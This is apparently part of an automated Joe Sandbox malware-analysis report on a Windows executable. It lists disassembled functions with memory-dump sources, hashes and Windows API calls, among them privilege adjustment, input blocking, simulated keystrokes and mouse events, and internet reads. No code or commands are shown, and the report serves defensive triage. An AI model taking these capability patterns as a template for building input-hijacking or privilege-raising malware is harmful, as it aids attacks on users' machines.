                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3541575487-0
                                                                                                                                                                                                                    • Opcode ID: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                                                                                                                                                                    • Instruction ID: db5ff5663728164251a6780c1f95401793cb79be8497d2e063b865fb5a3baa77
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B518872B08A8281EB14DF26D4902AC7760FB88B94F484732CB5E977A5CF7EE591C700
                                                                                                                                                                                                                    Function 00007FF656D357B0 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1682464887-0
                                                                                                                                                                                                                    • Opcode ID: e4554bc00dae79acf66b4cb450403028b462a58aae1405cf9917eeaf9ae9a37c
                                                                                                                                                                                                                    • Instruction ID: a89447cdb55e078f4fde7301cd7aa52545eefa0d015cc5c9caf084c16b9449b9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4554bc00dae79acf66b4cb450403028b462a58aae1405cf9917eeaf9ae9a37c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD314F72608B8586EB109F25E4802AE7770FF84B84F588631EB8E93765DF7DD546CB00
                                                                                                                                                                                                                    Function 00007FF656D1D5CC Relevance: 4.6, APIs: 3, Instructions: 59COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2278415577-0
                                                                                                                                                                                                                    • Opcode ID: f6a573ccc541ce2d1e79616149d64e3e13b5cf86bd70ff10f7bb53520a17d32b
                                                                                                                                                                                                                    • Instruction ID: df910435eb266af0f9a9909f397ce6ecc0b2c37d503ee763750f2e15e1162b5a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6a573ccc541ce2d1e79616149d64e3e13b5cf86bd70ff10f7bb53520a17d32b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C521D172A08A8586D704DF26E44026AB7A0FB88BD4F488A35DF4D97718CF7DD596C740
                                                                                                                                                                                                                    Function 00007FF656D2BF80 Relevance: 4.6, APIs: 3, Instructions: 54fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 33631002-0
                                                                                                                                                                                                                    • Opcode ID: c1a660ba6107f8f40afc549c60c0281f1e634fa1b65154c4abfb297250e0dda3
                                                                                                                                                                                                                    • Instruction ID: a66fb53cc320cf83f78a07c1a2ff6c6a6227696464017d04267148b4c488ef87
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1a660ba6107f8f40afc549c60c0281f1e634fa1b65154c4abfb297250e0dda3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F218C7261878086E3608F11E48439A73A0F385BA4F148735DB9C43B88DF3DD859CB40
                                                                                                                                                                                                                    Function 00007FF656D1D540 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3429775523-0
                                                                                                                                                                                                                    • Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                                                                                                                                                                    • Instruction ID: a032ead21fd8b8e3652f94512961f62d3bde55902c9cbefb93c43fca0e87709b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C0100736287818FE7108F21D4553A937A0F75476EF540A29E64986A99CF7EC158CB80
                                                                                                                                                                                                                    Function 00007FF656CF2F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: .
                                                                                                                                                                                                                    • API String ID: 0-248832578
                                                                                                                                                                                                                    • Opcode ID: 704ebd355b677e1258a9e20fb2f824619711b00144154a2c45bc08c04a856543
                                                                                                                                                                                                                    • Instruction ID: e6d98089876b0770c5afd70ccf1c8c71832e4c6539164e023ae302ff9e84e436
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 704ebd355b677e1258a9e20fb2f824619711b00144154a2c45bc08c04a856543
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45316AA2B186D254EB709F7298046B6E6B0FB50BE4F088635EE6D97BC4DE3DD441C300
                                                                                                                                                                                                                    Function 00007FF656CEBEF8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23timeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF656CE475C,?,?,00000000,00007FF656CE47D9,?,?,?,?,?,00007FF656D32210), ref: 00007FF656CEBF3F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Time$FileSystem
                                                                                                                                                                                                                    • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                                                                                                    • API String ID: 2086374402-595813830
                                                                                                                                                                                                                    • Opcode ID: 572b71549e45f6bab70ab7a1e99299a405b58e83dcd9cf08a8343814aa6f0cc3
                                                                                                                                                                                                                    • Instruction ID: f372dbc80443adc5748a2094aa9cd2c3b7443e0523f794a110c87ea5d83a3e09
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 572b71549e45f6bab70ab7a1e99299a405b58e83dcd9cf08a8343814aa6f0cc3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2F06D64A1DA8791EE059B96F9450B47330AF48BC0F8C5631E90EA6352EE3EE888C700
                                                                                                                                                                                                                    Function 00007FF656D371F4 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                                                                                    • Opcode ID: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                                                                                                                                                                    • Instruction ID: 75c90d55b489e6fd7ad217e2b4c750dd0526aa1d639549171de7987a036f09b2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB114C76B08B4182EB10DF26E1843697760FB88BA4F488631DB6D97B95CF7DD451CB40
                                                                                                                                                                                                                    Function 00007FF656D33778 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                                                                                                    • Opcode ID: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                                                                                                                                                                    • Instruction ID: fb4c345ff4bbdf3383fc5c7fcdbd41627e0c3a92a594308bd9c4c3e0cf1ed2ad
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBF0C861B0868281E7605B15F40026AB6B5FFC97D4F594334EB9D93BA9DE3DC044CB00
                                                                                                                                                                                                                    Function 00007FF656D1CCE0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 81990902-0
                                                                                                                                                                                                                    • Opcode ID: e99df4805a862b5b9dc981f920ded6dd422569f52d375cb2bbac79bcd7bc5f2c
                                                                                                                                                                                                                    • Instruction ID: 5cdd02839c3a4f543d43bda8aeaf32f412e90fdd738612de0b56e2ba73c6d617
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e99df4805a862b5b9dc981f920ded6dd422569f52d375cb2bbac79bcd7bc5f2c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09F065A6A14A4582EB54DB61D4553B92370FBD8F98F284B31CF0D9B654CF7DD096C240
                                                                                                                                                                                                                    Function 00007FF656D3E87C Relevance: 1.6, APIs: 1, Instructions: 62filenetworkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileInternetRead_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 101623796-0
                                                                                                                                                                                                                    • Opcode ID: c3326f14f3a704366430a438f9a2af4b616e46cbc6777093e0014b63cfdf3a9b
                                                                                                                                                                                                                    • Instruction ID: b49248e3ed67a09ab70e9b0b5d3b6050a018bbfca023cc3cb39275ac06a88138
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3326f14f3a704366430a438f9a2af4b616e46cbc6777093e0014b63cfdf3a9b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA219262B0864642FA70CF11E0107A92360FB85B84F885736DA4CA7BC5DF3EE901CB40
                                                                                                                                                                                                                    Function 00007FF656D29420 Relevance: 1.5, APIs: 1, Instructions: 26keyboardCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InputSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3431551938-0
                                                                                                                                                                                                                    • Opcode ID: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
                                                                                                                                                                                                                    • Instruction ID: af80b4d7a6bcfddd178fe7b79b722eb9c686cb5eb29f8ef7e7a906bde1edbca0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF09A6691868086D3208F15E44076A77A0F758789F446229EA8987B64CF3EC10ACF08
                                                                                                                                                                                                                    Function 00007FF656D2D1A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: mouse_event
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2434400541-0
                                                                                                                                                                                                                    • Opcode ID: d8d6f02688d8abf5cd4837f0aea5b825f774ed0048ed251121670875c750f025
                                                                                                                                                                                                                    • Instruction ID: df33459a0f9b4610bc4431878c8f9d242ed860fdfafbb1d671b1075a3541d456
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8d6f02688d8abf5cd4837f0aea5b825f774ed0048ed251121670875c750f025
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9E0DF35E0C00382F22A0A384D2A3360201AF91300E6C0B30CB4EE2ED4CD1FA681D715
                                                                                                                                                                                                                    Function 00007FF656D40A00 Relevance: 1.5, APIs: 1, Instructions: 23keyboardCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BlockInput
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3456056419-0
                                                                                                                                                                                                                    • Opcode ID: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                                                                                                                                                                    • Instruction ID: a1866e7e61c3a3142d238318f5b5a4f3982fde057370dc6a3929645b17be2096
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04E06D72B1820286EB449B72E08567A62A0AF88B84F1C5634DA5EC3396DEBDD890C700
                                                                                                                                                                                                                    Function 00007FF656D12BCF Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: NameUser
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2645101109-0
                                                                                                                                                                                                                    • Opcode ID: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                                                                                                                                                                    • Instruction ID: b59f2a33269821e8ea5410a2e57a31608120623c6809ee0455495389b27d0b91
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90C002B1614652D9E760DF64D8845DC3331FB1075CF945221E61A5E568DF7D9648C340
